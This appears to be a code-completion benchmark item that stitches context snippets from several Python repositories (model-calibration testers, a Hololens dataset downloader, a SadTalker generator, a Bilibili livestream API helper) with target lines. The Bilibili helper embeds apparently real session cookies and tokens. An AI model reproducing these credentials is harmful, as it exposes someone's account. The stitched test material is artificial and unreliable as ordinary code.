self.calibrate_evaluator.save_npz(logits_save_path)\n\n def log_eval_epoch_info(self, phase=\"Val\"):\n log_dict = {}\n log_dict[\"samples\"] = self.evaluator.num_samples()\n classify_metric, classify_table_data = self.evaluator.mean_score(print=False)\n log_dict.update(classify_metric)\n calibrate_metric, calibrate_table_data = self.calibrate_evaluator.mean_score(print=False)\n log_dict.update(calibrate_metric)\n logger.info(\"{} Epoch\\t{}\".format(\n phase, json.dumps(round_dict(log_dict))\n ))\n logger.info(\"\\n\" + AsciiTable(classify_table_data).table)\n logger.info(\"\\n\" + AsciiTable(calibrate_table_data).table)\n if self.cfg.wandb.enable:\n wandb_log_dict = {}\n wandb_log_dict.update(dict(\n (\"{}/{}\".format(phase, key), value) for (key, value) in log_dict.items()\n ))\n wandb_log_dict[\"{}/classify_score_table\".format(phase)] = (\n wandb.Table(\n columns=classify_table_data[0],\n data=classify_table_data[1:]\n )\n )\n wandb_log_dict[\"{}/calibrate_score_table\".format(phase)] = (\n wandb.Table(\n columns=calibrate_table_data[0],\n data=calibrate_table_data[1:]\n )\n )\n if \"test\" in phase.lower() and self.cfg.calibrate.visualize:\n fig_reliab, fig_hist = self.calibrate_evaluator.plot_reliability_diagram()\n wandb_log_dict[\"{}/calibrate_reliability\".format(phase)] = fig_reliab\n wandb_log_dict[\"{}/confidence_histogram\".format(phase)] = fig_hist\n wandb.log(wandb_log_dict)\n\n def post_temperature(self):\n _, self.val_loader = instantiate(self.cfg.data.object.trainval)\n model_with_temp = ModelWithTemperature(self.model, device=self.device)\n model_with_temp.set_temperature(self.val_loader)\n temp = model_with_temp.get_temperature()\n if self.cfg.wandb.enable:\n wandb.log({\n \"temperature\": temp\n })\n return temp\n \n def test(self):\n logger.info(\n \"Everything is perfect so far. Let's start testing. Good luck!\"\n )\n \n self.eval_epoch(self.test_loader, phase=\"Test\")\n if self.cfg.test.post_temperature:\n logger.info(\"Test with post-temperature scaling!\")\n temp = self.post_temperature()\n self.eval_epoch(self.test_loader, phase=\"TestPT\", temp=temp, post_temp=True)\n\n def run(self):\n self.test()"
},
{
"identifier": "OODTester",
"path": "calibrate/engine/ood_tester.py",
"snippet": "class OODTester(Tester):\n def __init__(self, cfg: DictConfig) -> None:\n super().__init__(cfg)\n\n def build_data_loader(self) -> None:\n # data pipeline\n self.in_test_loader = instantiate(self.cfg.data.object.in_dist)\n self.out_test_loader = instantiate(self.cfg.data.object.out_dist)\n\n def build_meter(self):\n self.batch_time_meter = AverageMeter()\n self.num_classes = self.cfg.model.num_classes\n self.evaluator = OODEvaluator(self.num_classes)\n\n def reset_meter(self):\n self.batch_time_meter.reset()\n self.evaluator.reset()\n\n @torch.no_grad()\n def eval_epoch(\n self,\n phase=\"Val\",\n temp=1.0,\n post_temp=False\n ) -> None:\n self.reset_meter()\n self.model.eval()\n\n end = time.time()\n for i, (inputs, labels) in enumerate(self.in_test_loader):\n inputs, labels = inputs.to(self.device), labels.to(self.device)\n # forward\n outputs = self.model(inputs)\n if post_temp:\n outputs = outputs / temp\n # metric\n predicts = F.softmax(outputs, dim=1)\n self.evaluator.update(\n to_numpy(predicts), to_numpy(labels),\n in_dist=True\n )\n # measure elapsed time\n self.batch_time_meter.update(time.time() - end)\n\n for i, (inputs, labels) in enumerate(self.out_test_loader):\n inputs, labels = inputs.to(self.device), labels.to(self.device)\n # forward\n outputs = self.model(inputs)\n if post_temp:\n outputs = outputs / temp\n # metric\n predicts = F.softmax(outputs, dim=1)\n self.evaluator.update(\n to_numpy(predicts), to_numpy(labels),\n in_dist=False\n )\n # measure elapsed time\n self.batch_time_meter.update(time.time() - end)\n end = time.time()\n self.log_eval_epoch_info(phase)\n\n def log_eval_epoch_info(self, phase=\"Val\"):\n log_dict = {}\n log_dict[\"samples\"] = self.evaluator.num_samples()\n metric, table_data = self.evaluator.mean_score(print=False)\n log_dict.update(metric)\n logger.info(\"{} Epoch\\t{}\".format(\n phase, json.dumps(round_dict(log_dict))\n ))\n logger.info(\"\\n\" + AsciiTable(table_data).table)\n if self.cfg.wandb.enable:\n wandb_log_dict = {}\n wandb_log_dict.update(dict(\n (\"{}/{}\".format(phase, key), value) for (key, value) in log_dict.items()\n ))\n wandb_log_dict[\"{}/classify_score_table\".format(phase)] = (\n wandb.Table(\n columns=table_data[0],\n data=table_data[1:]\n )\n )\n wandb.log(wandb_log_dict)\n\n def test(self):\n logger.info(\n \"Everything is perfect so far. Let's start testing. Good luck!\"\n )\n self.eval_epoch(phase=\"Test\")\n logger.info(\"Test with post-temperature scaling!\")\n temp = self.post_temperature()\n self.eval_epoch(phase=\"TestPT\", temp=temp, post_temp=True)"
},
{
"identifier": "set_random_seed",
"path": "calibrate/utils/misc.py",
"snippet": "def set_random_seed(seed: int = None, deterministic: bool = False):\n \"\"\"\n Set the random seed for the RNG in torch, numpy and python.\n\n Args:\n seed (int): if None, will use a strong random seed.\n deterministic (bool): Whether to set the deterministic option for\n CUDNN backend, i.e., set `torch.backends.cudnn.deterministic`\n to True and `torch.backends.cudnn.benchmark` to False.\n \"\"\"\n if seed is None:\n seed = (\n os.getpid()\n + int(datetime.now().strftime(\"%S%f\"))\n + int.from_bytes(os.urandom(2), \"big\")\n )\n logger = logging.getLogger(__name__)\n logger.info(\"Using a generated random seed {}\".format(seed))\n os.environ[\"PYTHONHASHSEED\"] = str(seed)\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n if deterministic:\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False"
}
] | import os
import sys
import logging
import hydra
from omegaconf import DictConfig, OmegaConf
from omegaconf.omegaconf import open_dict
from calibrate.engine import Tester, OODTester
from calibrate.utils import set_random_seed | 2,678 |
logger = logging.getLogger(__name__)
TESTER = {
"cv": Tester,
|
logger = logging.getLogger(__name__)
TESTER = {
"cv": Tester, | "ood": OODTester, | 1 | 2023-12-17 13:53:18+00:00 | 4k |
CaptainCook4D/downloader | download_hololens_data.py | [
{
"identifier": "prepare_hololens_2d_output_directory",
"path": "util.py",
"snippet": "def prepare_hololens_2d_output_directory(args, output_dir: Path):\n\toutput_dir.mkdir(parents=True, exist_ok=True)\n\t\n\tdata_directory = output_dir / Constants.CAPTAIN_COOK_4D\n\tdata_directory.mkdir(parents=True, exist_ok=True)\n\t\n\thololens_data_directory = data_directory / Constants.HOLOLENS\n\thololens_data_directory.mkdir(parents=True, exist_ok=True)\n\t\n\thololens_sync_data_directory = hololens_data_directory / Constants.SYNC\n\thololens_sync_data_directory.mkdir(parents=True, exist_ok=True)\n\t\n\thololens_sync_pv_data_directory = hololens_sync_data_directory / Constants.PV\n\thololens_sync_pv_data_directory.mkdir(parents=True, exist_ok=True)\n\t\n\treturn data_directory"
},
{
"identifier": "Constants",
"path": "util.py",
"snippet": "class Constants:\n\tCAPTAIN_COOK_4D = \"captain_cook_4d\"\n\t\n\tGOPRO = \"gopro\"\n\tHOLOLENS = \"hololens\"\n\tGOPRO_RESOLUTION_4K = \"gopro_4k\"\n\tGOPRO_RESOLUTION_360P = \"gopro_360p\"\n\t\n\tDATA_2D = \"data_2d\"\n\tRESOLUTION_360P = \"resolution_360p\"\n\tRESOLUTION_4K = \"resolution_4k\"\n\t\n\tRAW = \"raw\"\n\tSYNC = \"sync\"\n\t\n\tSPATIAL = \"spatial\"\n\t\n\tPV = \"pv\"\n\tMC = \"mc\"\n\t\n\tAB_ZIP = \"ab.zip\"\n\tDEPTH_ZIP = \"depth.zip\"\n\tFRAMES_ZIP = \"frames.zip\"\n\t\n\tDEPTH_AHAT = \"depth_ahat\"\n\tDEPTH = \"depth\"\n\tAB = \"ab\"\n\t\n\tDEPTH_POSE = \"depth_pose\"\n\tPV_POSE = \"pv_pose\"\n\tSPATIAL_POSE = \"spatial_pose\"\n\t\n\tIMU = \"imu\"\n\tDEPTH_POSE_PKL = \"depth_pose_pkl\"\n\tPV_POSE_PKL = \"pv_pose_pkl\"\n\tSPATIAL_POSE_PKL = \"spatial_pkl\"\n\t\n\tIMU_MAGNETOMETER = \"imu_magnetometer\"\n\tIMU_GYROSCOPE = \"imu_gyroscope\"\n\tIMU_ACCELEROMETER = \"imu_accelerometer\"\n\t\n\tIMU_ACCELEROMETER_PKL = \"imu_accelerometer_pkl\"\n\tIMU_GYROSCOPE_PKL = \"imu_gyroscope_pkl\"\n\tIMU_MAGNETOMETER_PKL = \"imu_magnetometer_pkl\"\n\t\n\tIS_HOLOLENS_ENABLED = \"is_hololens_enabled\"\n\tIS_SPATIAL_ENABLED = \"is_spatial_enabled\"\n\t\n\tDATA_JSON = \"data_json\"\n\t\n\tHOLOLENS_DEVICE_INFO = \"hololens_device_info\"\n\t\n\tRECORDING_ID = \"recording_id\"\n\tMETADATA = \"metadata\"\n\tDOWNLOAD_LINKS = \"download_links\"\n\tFILE_SIZES = \"file_sizes\"\n\tRECORDING = \"recording\"\n\t\n\tHOLOLENS_RAW_PV_FRAMES_ZIP = \"hololens_raw_pv_frames_zip\"\n\tHOLOLENS_RAW_DEPTH_AHAT_AB_ZIP = \"hololens_raw_depth_ahat_ab_zip\"\n\tHOLOLENS_RAW_DEPTH_AHAT_DEPTH_ZIP = \"hololens_raw_depth_ahat_depth_zip\"\n\tHOLOLENS_RAW_MC_PKL = \"hololens_raw_mc_pkl\"\n\t\n\tHOLOLENS_SYNC_PV_FRAMES_ZIP = \"hololens_sync_pv_frames_zip\"\n\tHOLOLENS_SYNC_DEPTH_AHAT_AB_ZIP = \"hololens_sync_depth_ahat_ab_zip\"\n\tHOLOLENS_SYNC_DEPTH_AHAT_DEPTH_ZIP = \"hololens_sync_depth_ahat_depth_zip\"\n\tHOLOLENS_SYNC_PV_VIDEO = \"hololens_sync_pv_video\"\n\t\n\tHOLOLENS_RAW_SPATIAL_PKL = \"hololens_raw_spatial_pkl\"\n\tHOLOLENS_RAW_IMU_MAGNETOMETER_PKL = \"hololens_raw_imu_magnetometer_pkl\"\n\tHOLOLENS_RAW_IMU_GYROSCOPE_PKL = \"hololens_raw_imu_gyroscope_pkl\"\n\tHOLOLENS_RAW_IMU_ACCELEROMETER_PKL = \"hololens_raw_imu_accelerometer_pkl\"\n\t\n\tHOLOLENS_SYNC_SPATIAL_PKL = \"hololens_sync_spatial_pkl\"\n\tHOLOLENS_SYNC_IMU_MAGNETOMETER_PKL = \"hololens_sync_imu_magnetometer_pkl\"\n\tHOLOLENS_SYNC_IMU_GYROSCOPE_PKL = \"hololens_sync_imu_gyroscope_pkl\"\n\tHOLOLENS_SYNC_IMU_ACCELEROMETER_PKL = \"hololens_sync_imu_accelerometer_pkl\"\n\t\n\tHOLOLENS_RAW_PV_POSE_PKL = \"hololens_raw_pv_pose_pkl\"\n\tHOLOLENS_SYNC_PV_POSE_PKL = \"hololens_sync_pv_pose_pkl\"\n\t\n\tHOLOLENS_RAW_DEPTH_POSE_PKL = \"hololens_raw_depth_pose_pkl\"\n\tHOLOLENS_SYNC_DEPTH_POSE_PKL = \"hololens_sync_depth_pose_pkl\"\n\t\n\tDURATION = \"duration\""
},
{
"identifier": "download_data",
"path": "util.py",
"snippet": "def download_data(download_url_links, download_file_paths):\n\t# ---- DON'T INCREASE MAX_WORKERS, ELSE DOWNLOAD WILL BE INTERRUPTED ----\n\twith ThreadPoolExecutor(max_workers=3) as executor:\n\t\tresults = list(\n\t\t\ttqdm(\n\t\t\t\texecutor.map(\n\t\t\t\t\tdownload_url,\n\t\t\t\t\tzip(download_url_links, download_file_paths)\n\t\t\t\t),\n\t\t\t\ttotal=len(download_url_links)\n\t\t\t)\n\t\t)\n\treturn results"
}
] | import argparse
import json
from pathlib import Path
from util import prepare_hololens_2d_output_directory, Constants, download_data | 1,659 |
# Please note that not all videos are recorded with hololens.
# Roughly, 60 videos are recorded only with GoPro, and they do not have hololens components.
# Due to device instability, roughly additional 40 videos don't have spatial data that includes Pose, 3D Hand Data
def process_download_hololens_data(download_args):
# ---- Parse Download Links Json ----
with open("metadata/download_links.json", "r") as f:
download_links = json.load(f)
output_dir = Path(download_args.output_dir)
data_directory = prepare_hololens_2d_output_directory(download_args, output_dir)
download_url_links = []
download_file_paths = []
for index, (recording_id, recording_download_link_dict) in enumerate(download_links.items()):
if download_args.data2d:
|
# Please note that not all videos are recorded with hololens.
# Roughly, 60 videos are recorded only with GoPro, and they do not have hololens components.
# Due to device instability, roughly additional 40 videos don't have spatial data that includes Pose, 3D Hand Data
def process_download_hololens_data(download_args):
# ---- Parse Download Links Json ----
with open("metadata/download_links.json", "r") as f:
download_links = json.load(f)
output_dir = Path(download_args.output_dir)
data_directory = prepare_hololens_2d_output_directory(download_args, output_dir)
download_url_links = []
download_file_paths = []
for index, (recording_id, recording_download_link_dict) in enumerate(download_links.items()):
if download_args.data2d: | if Constants.HOLOLENS_SYNC_PV_VIDEO in recording_download_link_dict: | 1 | 2023-12-16 00:27:29+00:00 | 4k |
mjavadpur/Sadtalker_LongVideos | src/facerender/modules/generator.py | [
{
"identifier": "ResBlock2d",
"path": "src/facerender/modules/util.py",
"snippet": "class ResBlock2d(nn.Module):\n \"\"\"\n Res block, preserve spatial resolution.\n \"\"\"\n\n def __init__(self, in_features, kernel_size, padding):\n super(ResBlock2d, self).__init__()\n self.conv1 = nn.Conv2d(in_channels=in_features, out_channels=in_features, kernel_size=kernel_size,\n padding=padding)\n self.conv2 = nn.Conv2d(in_channels=in_features, out_channels=in_features, kernel_size=kernel_size,\n padding=padding)\n self.norm1 = BatchNorm2d(in_features, affine=True)\n self.norm2 = BatchNorm2d(in_features, affine=True)\n\n def forward(self, x):\n out = self.norm1(x)\n out = F.relu(out)\n out = self.conv1(out)\n out = self.norm2(out)\n out = F.relu(out)\n out = self.conv2(out)\n out += x\n return out"
},
{
"identifier": "SameBlock2d",
"path": "src/facerender/modules/util.py",
"snippet": "class SameBlock2d(nn.Module):\n \"\"\"\n Simple block, preserve spatial resolution.\n \"\"\"\n\n def __init__(self, in_features, out_features, groups=1, kernel_size=3, padding=1, lrelu=False):\n super(SameBlock2d, self).__init__()\n self.conv = nn.Conv2d(in_channels=in_features, out_channels=out_features,\n kernel_size=kernel_size, padding=padding, groups=groups)\n self.norm = BatchNorm2d(out_features, affine=True)\n if lrelu:\n self.ac = nn.LeakyReLU()\n else:\n self.ac = nn.ReLU()\n\n def forward(self, x):\n out = self.conv(x)\n out = self.norm(out)\n out = self.ac(out)\n return out"
},
{
"identifier": "UpBlock2d",
"path": "src/facerender/modules/util.py",
"snippet": "class UpBlock2d(nn.Module):\n \"\"\"\n Upsampling block for use in decoder.\n \"\"\"\n\n def __init__(self, in_features, out_features, kernel_size=3, padding=1, groups=1):\n super(UpBlock2d, self).__init__()\n\n self.conv = nn.Conv2d(in_channels=in_features, out_channels=out_features, kernel_size=kernel_size,\n padding=padding, groups=groups)\n self.norm = BatchNorm2d(out_features, affine=True)\n\n def forward(self, x):\n out = F.interpolate(x, scale_factor=2)\n out = self.conv(out)\n out = self.norm(out)\n out = F.relu(out)\n return out"
},
{
"identifier": "DownBlock2d",
"path": "src/facerender/modules/util.py",
"snippet": "class DownBlock2d(nn.Module):\n \"\"\"\n Downsampling block for use in encoder.\n \"\"\"\n\n def __init__(self, in_features, out_features, kernel_size=3, padding=1, groups=1):\n super(DownBlock2d, self).__init__()\n self.conv = nn.Conv2d(in_channels=in_features, out_channels=out_features, kernel_size=kernel_size,\n padding=padding, groups=groups)\n self.norm = BatchNorm2d(out_features, affine=True)\n self.pool = nn.AvgPool2d(kernel_size=(2, 2))\n\n def forward(self, x):\n out = self.conv(x)\n out = self.norm(out)\n out = F.relu(out)\n out = self.pool(out)\n return out"
},
{
"identifier": "ResBlock3d",
"path": "src/facerender/modules/util.py",
"snippet": "class ResBlock3d(nn.Module):\n \"\"\"\n Res block, preserve spatial resolution.\n \"\"\"\n\n def __init__(self, in_features, kernel_size, padding):\n super(ResBlock3d, self).__init__()\n self.conv1 = nn.Conv3d(in_channels=in_features, out_channels=in_features, kernel_size=kernel_size,\n padding=padding)\n self.conv2 = nn.Conv3d(in_channels=in_features, out_channels=in_features, kernel_size=kernel_size,\n padding=padding)\n self.norm1 = BatchNorm3d(in_features, affine=True)\n self.norm2 = BatchNorm3d(in_features, affine=True)\n\n def forward(self, x):\n out = self.norm1(x)\n out = F.relu(out)\n out = self.conv1(out)\n out = self.norm2(out)\n out = F.relu(out)\n out = self.conv2(out)\n out += x\n return out"
},
{
"identifier": "SPADEResnetBlock",
"path": "src/facerender/modules/util.py",
"snippet": "class SPADEResnetBlock(nn.Module):\n def __init__(self, fin, fout, norm_G, label_nc, use_se=False, dilation=1):\n super().__init__()\n # Attributes\n self.learned_shortcut = (fin != fout)\n fmiddle = min(fin, fout)\n self.use_se = use_se\n # create conv layers\n self.conv_0 = nn.Conv2d(fin, fmiddle, kernel_size=3, padding=dilation, dilation=dilation)\n self.conv_1 = nn.Conv2d(fmiddle, fout, kernel_size=3, padding=dilation, dilation=dilation)\n if self.learned_shortcut:\n self.conv_s = nn.Conv2d(fin, fout, kernel_size=1, bias=False)\n # apply spectral norm if specified\n if 'spectral' in norm_G:\n self.conv_0 = spectral_norm(self.conv_0)\n self.conv_1 = spectral_norm(self.conv_1)\n if self.learned_shortcut:\n self.conv_s = spectral_norm(self.conv_s)\n # define normalization layers\n self.norm_0 = SPADE(fin, label_nc)\n self.norm_1 = SPADE(fmiddle, label_nc)\n if self.learned_shortcut:\n self.norm_s = SPADE(fin, label_nc)\n\n def forward(self, x, seg1):\n x_s = self.shortcut(x, seg1)\n dx = self.conv_0(self.actvn(self.norm_0(x, seg1)))\n dx = self.conv_1(self.actvn(self.norm_1(dx, seg1)))\n out = x_s + dx\n return out\n\n def shortcut(self, x, seg1):\n if self.learned_shortcut:\n x_s = self.conv_s(self.norm_s(x, seg1))\n else:\n x_s = x\n return x_s\n\n def actvn(self, x):\n return F.leaky_relu(x, 2e-1)"
},
{
"identifier": "DenseMotionNetwork",
"path": "src/facerender/modules/dense_motion.py",
"snippet": "class DenseMotionNetwork(nn.Module):\n \"\"\"\n Module that predicting a dense motion from sparse motion representation given by kp_source and kp_driving\n \"\"\"\n\n def __init__(self, block_expansion, num_blocks, max_features, num_kp, feature_channel, reshape_depth, compress,\n estimate_occlusion_map=False):\n super(DenseMotionNetwork, self).__init__()\n # self.hourglass = Hourglass(block_expansion=block_expansion, in_features=(num_kp+1)*(feature_channel+1), max_features=max_features, num_blocks=num_blocks)\n self.hourglass = Hourglass(block_expansion=block_expansion, in_features=(num_kp+1)*(compress+1), max_features=max_features, num_blocks=num_blocks)\n\n self.mask = nn.Conv3d(self.hourglass.out_filters, num_kp + 1, kernel_size=7, padding=3)\n\n self.compress = nn.Conv3d(feature_channel, compress, kernel_size=1)\n self.norm = BatchNorm3d(compress, affine=True)\n\n if estimate_occlusion_map:\n # self.occlusion = nn.Conv2d(reshape_channel*reshape_depth, 1, kernel_size=7, padding=3)\n self.occlusion = nn.Conv2d(self.hourglass.out_filters*reshape_depth, 1, kernel_size=7, padding=3)\n else:\n self.occlusion = None\n\n self.num_kp = num_kp\n\n\n def create_sparse_motions(self, feature, kp_driving, kp_source):\n bs, _, d, h, w = feature.shape\n identity_grid = make_coordinate_grid((d, h, w), type=kp_source['value'].type())\n identity_grid = identity_grid.view(1, 1, d, h, w, 3)\n coordinate_grid = identity_grid - kp_driving['value'].view(bs, self.num_kp, 1, 1, 1, 3)\n \n # if 'jacobian' in kp_driving:\n if 'jacobian' in kp_driving and kp_driving['jacobian'] is not None:\n jacobian = torch.matmul(kp_source['jacobian'], torch.inverse(kp_driving['jacobian']))\n jacobian = jacobian.unsqueeze(-3).unsqueeze(-3).unsqueeze(-3)\n jacobian = jacobian.repeat(1, 1, d, h, w, 1, 1)\n coordinate_grid = torch.matmul(jacobian, coordinate_grid.unsqueeze(-1))\n coordinate_grid = coordinate_grid.squeeze(-1) \n\n\n driving_to_source = coordinate_grid + kp_source['value'].view(bs, self.num_kp, 1, 1, 1, 3) # (bs, num_kp, d, h, w, 3)\n\n #adding background feature\n identity_grid = identity_grid.repeat(bs, 1, 1, 1, 1, 1)\n sparse_motions = torch.cat([identity_grid, driving_to_source], dim=1) #bs num_kp+1 d h w 3\n \n # sparse_motions = driving_to_source\n\n return sparse_motions\n\n def create_deformed_feature(self, feature, sparse_motions):\n bs, _, d, h, w = feature.shape\n feature_repeat = feature.unsqueeze(1).unsqueeze(1).repeat(1, self.num_kp+1, 1, 1, 1, 1, 1) # (bs, num_kp+1, 1, c, d, h, w)\n feature_repeat = feature_repeat.view(bs * (self.num_kp+1), -1, d, h, w) # (bs*(num_kp+1), c, d, h, w)\n sparse_motions = sparse_motions.view((bs * (self.num_kp+1), d, h, w, -1)) # (bs*(num_kp+1), d, h, w, 3) !!!!\n sparse_deformed = F.grid_sample(feature_repeat, sparse_motions)\n sparse_deformed = sparse_deformed.view((bs, self.num_kp+1, -1, d, h, w)) # (bs, num_kp+1, c, d, h, w)\n return sparse_deformed\n\n def create_heatmap_representations(self, feature, kp_driving, kp_source):\n spatial_size = feature.shape[3:]\n gaussian_driving = kp2gaussian(kp_driving, spatial_size=spatial_size, kp_variance=0.01)\n gaussian_source = kp2gaussian(kp_source, spatial_size=spatial_size, kp_variance=0.01)\n heatmap = gaussian_driving - gaussian_source\n\n # adding background feature\n zeros = torch.zeros(heatmap.shape[0], 1, spatial_size[0], spatial_size[1], spatial_size[2]).type(heatmap.type())\n heatmap = torch.cat([zeros, heatmap], dim=1)\n heatmap = heatmap.unsqueeze(2) # (bs, num_kp+1, 1, d, h, w)\n return heatmap\n\n def forward(self, feature, kp_driving, kp_source):\n bs, _, d, h, w = feature.shape\n\n feature = self.compress(feature)\n feature = self.norm(feature)\n feature = F.relu(feature)\n\n out_dict = dict()\n sparse_motion = self.create_sparse_motions(feature, kp_driving, kp_source)\n deformed_feature = self.create_deformed_feature(feature, sparse_motion)\n\n heatmap = self.create_heatmap_representations(deformed_feature, kp_driving, kp_source)\n\n input_ = torch.cat([heatmap, deformed_feature], dim=2)\n input_ = input_.view(bs, -1, d, h, w)\n\n # input = deformed_feature.view(bs, -1, d, h, w) # (bs, num_kp+1 * c, d, h, w)\n\n prediction = self.hourglass(input_)\n\n\n mask = self.mask(prediction)\n mask = F.softmax(mask, dim=1)\n out_dict['mask'] = mask\n mask = mask.unsqueeze(2) # (bs, num_kp+1, 1, d, h, w)\n \n zeros_mask = torch.zeros_like(mask) \n mask = torch.where(mask < 1e-3, zeros_mask, mask) \n\n sparse_motion = sparse_motion.permute(0, 1, 5, 2, 3, 4) # (bs, num_kp+1, 3, d, h, w)\n deformation = (sparse_motion * mask).sum(dim=1) # (bs, 3, d, h, w)\n deformation = deformation.permute(0, 2, 3, 4, 1) # (bs, d, h, w, 3)\n\n out_dict['deformation'] = deformation\n\n if self.occlusion:\n bs, c, d, h, w = prediction.shape\n prediction = prediction.view(bs, -1, h, w)\n occlusion_map = torch.sigmoid(self.occlusion(prediction))\n out_dict['occlusion_map'] = occlusion_map\n\n return out_dict"
}
] | import torch
import torch.nn.functional as F
from torch import nn
from src.facerender.modules.util import ResBlock2d, SameBlock2d, UpBlock2d, DownBlock2d, ResBlock3d, SPADEResnetBlock
from src.facerender.modules.dense_motion import DenseMotionNetwork | 3,532 |
class OcclusionAwareGenerator(nn.Module):
"""
Generator follows NVIDIA architecture.
"""
def __init__(self, image_channel, feature_channel, num_kp, block_expansion, max_features, num_down_blocks, reshape_channel, reshape_depth,
num_resblocks, estimate_occlusion_map=False, dense_motion_params=None, estimate_jacobian=False):
super(OcclusionAwareGenerator, self).__init__()
if dense_motion_params is not None:
self.dense_motion_network = DenseMotionNetwork(num_kp=num_kp, feature_channel=feature_channel,
estimate_occlusion_map=estimate_occlusion_map,
**dense_motion_params)
else:
self.dense_motion_network = None
self.first = SameBlock2d(image_channel, block_expansion, kernel_size=(7, 7), padding=(3, 3))
down_blocks = []
for i in range(num_down_blocks):
in_features = min(max_features, block_expansion * (2 ** i))
out_features = min(max_features, block_expansion * (2 ** (i + 1)))
|
class OcclusionAwareGenerator(nn.Module):
"""
Generator follows NVIDIA architecture.
"""
def __init__(self, image_channel, feature_channel, num_kp, block_expansion, max_features, num_down_blocks, reshape_channel, reshape_depth,
num_resblocks, estimate_occlusion_map=False, dense_motion_params=None, estimate_jacobian=False):
super(OcclusionAwareGenerator, self).__init__()
if dense_motion_params is not None:
self.dense_motion_network = DenseMotionNetwork(num_kp=num_kp, feature_channel=feature_channel,
estimate_occlusion_map=estimate_occlusion_map,
**dense_motion_params)
else:
self.dense_motion_network = None
self.first = SameBlock2d(image_channel, block_expansion, kernel_size=(7, 7), padding=(3, 3))
down_blocks = []
for i in range(num_down_blocks):
in_features = min(max_features, block_expansion * (2 ** i))
out_features = min(max_features, block_expansion * (2 ** (i + 1))) | down_blocks.append(DownBlock2d(in_features, out_features, kernel_size=(3, 3), padding=(1, 1))) | 3 | 2023-12-19 11:01:35+00:00 | 4k |
Westlake-geeks/bilibili-livestream-slicer | main.py | [
{
"identifier": "is_live",
"path": "api.py",
"snippet": "def is_live(uid):\n live_api = \"https://api.live.bilibili.com/room/v1/Room/room_init?id=%s\" % str(\n uid)\n rtn = my_request(live_api)\n data_dict = json.loads(rtn)\n\n data_value = data_dict.get('data')\n live_status_value = data_value.get('live_status')\n if live_status_value:\n return True\n else:\n return False"
},
{
"identifier": "get_stream_url",
"path": "api.py",
"snippet": "def get_stream_url(uid):\n stream_api = \"https://api.live.bilibili.com/room/v1/Room/playUrl?cid=%s&quality=4&platform=web\" % uid\n\n rtn = my_request(stream_api)\n data_dict = json.loads(rtn)\n\n data_value = data_dict.get('data')\n durl_value = data_value.get('durl')\n\n headers = dict()\n headers['cookie'] = r\"buvid_fp_plain=undefined; CURRENT_BLACKGAP=0; blackside_state=0; LIVE_BUVID=AUTO2616596088417426; rpdid=|(k|m|))Y~k~0J'uYY)lmlul~; hit-new-style-dyn=1; go-back-dyn=1; is-2022-channel=1; header_theme_version=CLOSE; CURRENT_PID=b03f3c10-ceb5-11ed-b59d-47f8dacf4eec; FEED_LIVE_VERSION=V8; buvid3=103FCEA2-4D34-4196-5E7B-7321C8A1082118620infoc; b_nut=1690476718; _uuid=B1038F2AB-E8CD-29A2-4728-F82FE285F59D84428infoc; buvid4=CFCD8B8D-0FCC-F601-2753-DA825E11CFE613020-022072800-fr%2BgMSZdqRJTFAAYsS9ACQ%3D%3D; i-wanna-go-back=-1; b_ut=5; hit-dyn-v2=1; i-wanna-go-feeds=2; DedeUserID=325718681; DedeUserID__ckMd5=319313351948fd48; CURRENT_QUALITY=116; SESSDATA=c555e98c%2C1711883936%2Caf616%2Aa2CjAD_KFN4n_1-0P_VrGmaHuTOhode3kKsjtR7Aq0iz1U5TFRzKUl69JUDZ-5W532pswSVkFKMUpyQkQ3NmlWYldjLWtnSG9hcG9lQ1RYa0VKaEh3TFlybGxjdlpJQkkwekYwYy0tckZhc1d3eWlrT1k2NHpvQmQtS1MtUGlxU2RxdEM2UFcyWWlnIIEC; bili_jct=f30d6a38050b9fd22f87748b88e5c40f; sid=8nj7ny5x; bili_ticket=eyJhbGciOiJIUzI1NiIsImtpZCI6InMwMyIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2OTY2MDgwNDYsImlhdCI6MTY5NjM0ODc4NiwicGx0IjotMX0.P976bqS0e1zm2k4khjnX5aqxWCmSIE-zA6MlVXq32wo; bili_ticket_expires=1696607986; fingerprint=c2d58d86c60e35d56558bf9942a9deac; CURRENT_FNVAL=4048; home_feed_column=5; browser_resolution=1699-945; share_source_origin=WEIXIN; bsource=share_source_weixinchat; bp_video_offset_325718681=849021837940621320; buvid_fp=c2d58d86c60e35d56558bf9942a9deac; b_lsid=5469973A_18B009161BC; PVID=1\"\n headers['Accept-Encoding'] = 'identity'\n headers['referer'] = 'https://www.bilibili.com/video/BV1XF411C7xh/?spm_id_from=333.1007.tianma.1-3-3.click&vd_source=d4827c2f1802c9c5b667bc324c406c18'\n headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47'\n\n retry_time = 0\n return durl_value, headers\n if durl_value:\n try:\n return durl_value, headers\n except Exception as e:\n time.sleep(1)\n print(\"retry\", retry_time,\n \"]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]\")\n print(e)\n retry_time += 1\n pass"
},
{
"identifier": "get_name",
"path": "api.py",
"snippet": "def get_name(uid):\n live_api = \"https://api.live.bilibili.com/room/v1/Room/room_init?id=%s\" % str(\n uid)\n rtn = my_request(live_api)\n data_dict = json.loads(rtn)\n\n data_value = data_dict.get('data')\n duid_value = data_value.get('uid')\n\n home_url = \"https://space.bilibili.com/%s/\" % duid_value\n\n headers = {\n 'cookie': \"buvid_fp_plain=undefined; CURRENT_BLACKGAP=0; blackside_state=0; LIVE_BUVID=AUTO2616596088417426; rpdid=|(k|m|))Y~k~0J'uYY)lmlul~; hit-new-style-dyn=1; go-back-dyn=1; is-2022-channel=1; header_theme_version=CLOSE; CURRENT_PID=b03f3c10-ceb5-11ed-b59d-47f8dacf4eec; FEED_LIVE_VERSION=V8; buvid3=103FCEA2-4D34-4196-5E7B-7321C8A1082118620infoc; b_nut=1690476718; _uuid=B1038F2AB-E8CD-29A2-4728-F82FE285F59D84428infoc; buvid4=CFCD8B8D-0FCC-F601-2753-DA825E11CFE613020-022072800-fr%2BgMSZdqRJTFAAYsS9ACQ%3D%3D; i-wanna-go-back=-1; b_ut=5; hit-dyn-v2=1; i-wanna-go-feeds=2; DedeUserID=325718681; DedeUserID__ckMd5=319313351948fd48; 